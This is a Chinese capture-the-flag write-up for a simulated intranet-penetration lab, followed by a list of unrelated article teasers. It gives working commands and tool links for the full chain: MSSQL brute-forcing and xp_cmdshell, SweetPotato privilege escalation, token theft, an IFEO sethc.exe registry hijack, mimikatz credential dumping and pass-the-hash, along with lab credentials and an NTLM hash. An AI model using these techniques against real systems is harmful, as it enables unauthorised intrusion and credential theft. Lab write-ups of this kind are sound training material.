【内网渗透】春秋云镜 Tsclient WP

news2024/11/28 20:54:09

前言

mssql连接和攻击、windows提权、令牌窃取、镜像劫持

flag1

上来就扫给的地址
nmap:
在这里插入图片描述
结合题目的mssql知识点,估计是从这里入手了,尝试爆破用户名和密码,这里先用fscan来爆,可以直接爆出来(别的工具也可)
在这里插入图片描述
得到

sa 1qaz!QAZ

用这个工具去进行后面的攻击

https://github.com/SafeGroceryStore/MDUT/releases/tag/v2.1.1

在这里插入图片描述
激活组件下的Xpcmdshell即可命令执行
尝试访问Users/Administrator下的文件无回显,新建文件报错,目前我们没有权限读取,那么先配代理,不配代理远程桌面都连不上。chisel:
在这里插入图片描述
跳板机这边是windows,所以要下windows的chisel.exe,跳板机上执行的命令就多个.exe,其他一样。
配好以后打开本机proxifier配置代理服务,不再赘述。
上传甜土豆,地址如下

https://github.com/uknowsec/SweetPotato

(刚打的时候我也疑惑,为什么就知道要上传甜土豆,然后大哥们说都是经验…
不过甜土豆确实可以针对大部分的windows去提权)
直接利用
在这里插入图片描述
-a 后面加命令 这里我添加一个用户为sapphire,命令自查,然后给最高权限
在这里插入图片描述
登陆找到flag1
在这里插入图片描述
在这里插入图片描述

flag2

给了提示Maybe you should focus on user sessions
注意会话状态
quser命令 # 查看当前服务器用户连接状态
在这里插入图片描述
发现有个john在连接这台机子,所以这台主机是存在John的令牌的,尝试进行令牌窃取,这里我参考别人的文章用的ShrakToken,会报错,安装这个就行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安装结束以后就可以用了,用上面提到的数据库连接软件上传SharkToken.exe进来,然后使用管理员权限打开cmd,用sharktoken进行令牌窃取
在这里插入图片描述
窃取以后 net use查看有个网络共享的文件夹在这里插入图片描述
在这里插入图片描述
读取文件
在这里插入图片描述
得到一个用户名和密码,并且提示镜像劫持。

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#登陆

做好信息收集,fscan扫C段

NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:2096:324f:d89b:c8fb
[*] 172.22.8.31          XIAORANG\WIN19-CLIENT      
NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] 172.22.8.15    [+]DC XIAORANG\DC01              
[*] WebTitle:http://172.22.8.18        code:200 len:703    title:IIS Windows Server.
[*] 172.22.8.46          XIAORANG\WIN2016           Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.8.46        code:200 len:703    title:IIS Windows Server

本机是172.22.8.18
先看看本机情况
在这里插入图片描述
因为主DNS后缀为空,所以这个机子不在域内
那么还有三个机子

172.22.8.31 WIN19-CLIENT
172.22.8.15 [+]DC XIAORANG\DC01 域控
172.22.8.46 XIAORANG\WIN2016           Windows Server 2016 Datacenter

用crackmapexec进行一个枚举登陆,其实也不用,就这几台机子试一下就行了

proxychains  crackmapexec  smb 172.22.8.0/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' --loggedon-users

用rdesktop登陆,用户名Aldrich,密码Ald@rLMWuy7Z!#

proxychains rdesktop 172.22.8.46(试了以后只有这个可以)

登陆以后提示要改密码,那就改,改完以后用windows自带的远程桌面登陆,不然kali的太卡了
在这里插入图片描述
提示了镜像劫持,网上搜文章试试

Get-Acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

在这里插入图片描述
普通用户也可以创建,这里参考别人的

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后锁定屏幕,按5次shift即可,我这添加了个新管理员,其实直接将刚才登陆的用户设置成管理员就可以了,因为新添加的用户不在域内.
在这里插入图片描述
得到flag2

flag3

在这里插入图片描述
查看域管用户
在这里插入图片描述
接着上传mimikatz到172.22.8.46里,抓取hash,怎么上传文件百度就有
管理员权限运行cmd,提权,抓密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

在这里插入图片描述
刚好这里有域管的NTLM
使用mimikatz进行hash传递攻击

.\mimikatz.exe
sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值
例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........

那么就是

sekurlsa::pth /user:WIN2016$ /domain:g1ts /ntlm:e64a6ccc013938f2c6daaa63480727c5

然后就会弹出一个cmd.exe可以直接访问到域控的文件,拿到flag3
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/528485.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

0.96寸oled显示坏苹果(badapple)

前言 俗话说:有屏幕的地方就会有badapple。 下面带来使用0.96寸OLED屏幕显示badapple的教程。 1、获取视频 首先从网上下载badapple的视频,下载地址:badapple 2、抓取视频图片 使用OLED播放视频的思想就是将视频分成一张一张的图片然后进行…

叉乘在图形学中的几何意义 ---- 判断一个点是否在三角形内

1 叉乘是什么 先简单介绍一下叉乘(cross product): a → b → \overrightarrow{a} \times \overrightarrow{b} a b ,其结果,还是一个向量。 其方向,符合右手螺旋定则(右手手指头从a转向b,看大拇指指向哪…

声音合成——Foley Sound——DECASE项目——多模态智能感知与应用——VariantAutoencoder(VAE)代码实现(7)

文章目录 概述VAE代码实现关闭eager execution修改bottlenectk组件修改loss损失函数 Preprocessline模块实现Loader模块Padder模块LogSpectrogramExtractor模块MinMaxNormaliser模块Saver模块PreprocessPipeLine模块知识补充property修饰词 train训练模块load_fsdd模块train模块…

针对基于智能卡进行认证的活动目录攻击

最近,我参与了一项攻击基于智能卡的活动目录的工作。实际上,你根本不需要使用物理智能卡来验证登录这个活动目录。证书的属性决定了它是否可以用于基于智能卡进行登录。因此,如果你能获得相应的私钥,那么就可以绕过智能卡的验证实…

ubuntu 22.04 安装 Docker Desktop 及docker介绍

目录 一、Docker Desktop 安装 1、我们先去官网下载安装包 2、Install Docker Desktop on Ubuntu 3、Launch Docker Desktop 二、Docker 介绍 什么是docker 如何使用docker docker是如何工作的 docker build docker run docker pull 一、Docker Desktop 安装 1、我们先…

网络应用技术师技能考试试题+讲解

作者简介:一名云计算网络运维人员、每天分享网络与运维的技术与干货。 座右铭:低头赶路,敬事如仪 个人主页:网络豆的主页​​​​​​ 前言 本章将会讲解网络应用技术师技能考试试题 一.正文 一、单选题(每题1分,满分50分) 1. 设信号的波特率为800Baud,采用幅度…

肠道微生物群:心力衰竭的新治疗靶点

谷禾健康 心力衰竭 Heart Failure(HF) 心力衰竭是一种严重的心血管疾病,其特点是较高的发病率和死亡率,同时也会带来高昂的医疗成本。 一般都认为心力衰竭是老年人的疾病,但其实心力衰竭已经呈现年轻化趋势。 以上症状…

a标签属性href的多种写法

众所周知,a标签的最重要功能是实现超链接和锚点。而且,大多数人认为a标签最重要的作用是实现超链接,其实不单单是实现超链接的方法,今天新起点博客就来整理下a标签中href的几种用法。 1、a href“[removed]js_method();” 这是常用…

即拼七人拼团系统开发模式,为什么这么火?

即拼七人拼团模式主要是结合了拼团模式的奖励机制和二二复制系统的排位玩法,将产品销售中的利润最大化让利于拼团的用户,刺激用户主动分享推广,以解决平台引流和用户活跃度的问题。 具体来说,即拼七人拼团模式就是用户进入平台购买…

崩坏:星穹铁道私人服务器搭建教程

准备工具: 一台 Windows 系统服务器 《崩坏:星穹铁道》启动器 《崩坏:星穹铁道》客户端 如果以上各项你都准备好了的话,现在就开始吧! 首先完全解压你的《崩坏:星穹铁道》客户端以及SR启动器。 解压完成…

你不知道的JavaScript的事件循环

JavaScript的事件循环 JavaScript语言的一大特点就是单线程,也就是说,同一个时间只能做一件事。那么,为什么JavaScript不能有多个线程呢?这样能提高效率啊。这也与它的用途有关。作为浏览器脚本语言,JavaScript的主要…

Kubernetes二进制部署 单节点

目录 1.环境准备 1.关闭防火墙和selinux 2.关闭swap 3.设置主机名 4.在master添加hosts 5.桥接的IPv4流量传递到iptables的链 6.时间同步 2.部署etcd集群 1.master节点部署 2.在node1与node2节点修改 3.在master1节点上进行启动 4.部署docker引擎 3.部署 Master 组…

麻了,同样是科班出身,学弟月薪却是我的3倍

我有个同学大学毕业,因为却少工作经验,又不愿意去正经的互联网企业做实习生,他嫌工资太低,于是进了家外包公司,那时候感觉待遇还可以。可现在五年过去了,他想跳槽却鲜有人问津。最可气的是比他晚一年毕业的…

Java中的七种设计原则

1.开闭原则 对扩展开放,对修改关闭。在程序需要进行扩展的时候,不能去修改原有的代码,要去实现一个热插拔的效果。简言之,是为了使程序的扩展性好,易于维护和升级。 下面是输入法设置皮肤的例子: // 抽象皮…

Linux入门---缓冲区模拟实现

前言 有了前面的基础我们知道c语言的缓冲区本质上就是FILE结构体的一部分,我们每次使用stdout将数据打印到屏幕上时,本质上是先将数据拷贝到FILE结构体的缓冲区中,然后再拷贝到内核缓冲区中也就是file结构体里面的缓冲区,最后再刷…

TSN网络流量记录器:一种经济高效的解决方案,用于验证汽车网络中的以太网融合。

在未来几年,汽车线束将从不同协议的异构网络转变为分层的同构以太网网络。在这种新情况下,模拟真实车辆网络的实验室测试台将需要分析工具以支持它们在车内通信验证过程中进行验证。 汽车向以太网融合原因 随着汽车内部技术变得越来越复杂,相…

信息调查的观念

每次做一件事前都要把这件事调查清楚,比如考一门科目我们要把和这门科目有关的资源都收集起来,然后把再从中筛选出有用的信息,如数值计算方法我们在考试前就可以把b站有关的学习资源网课或者前人总结的考试经验做个收集总结,做出对…

正则表达式 - 量词

目录 一、贪心、懒惰和占有 二、用 *、 和 ? 进行匹配 三、匹配特定次数 四、懒惰量词 五、占有量词 六、示例——括号字符串计数 {m,n} 是通用形式的量词,正则表达式还有三个常用量词,分别是 、?、*。它们的形态虽然不同于 {m,n},功…

8年测试总结,项目/团队如何做自动化测试?效率价值?吐血整理...

目录:导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结(尾部小惊喜) 前言 Python自动化测试&…

Linux:centos:用户基础设置》》添加,修改属性,删除,修改密码

useradd (属性) 用户 新建用户 usermod (属性) 用户 调整用户属性 userdel (属性) 用户 删除用户 passwd (属性) 用户 修改用户密…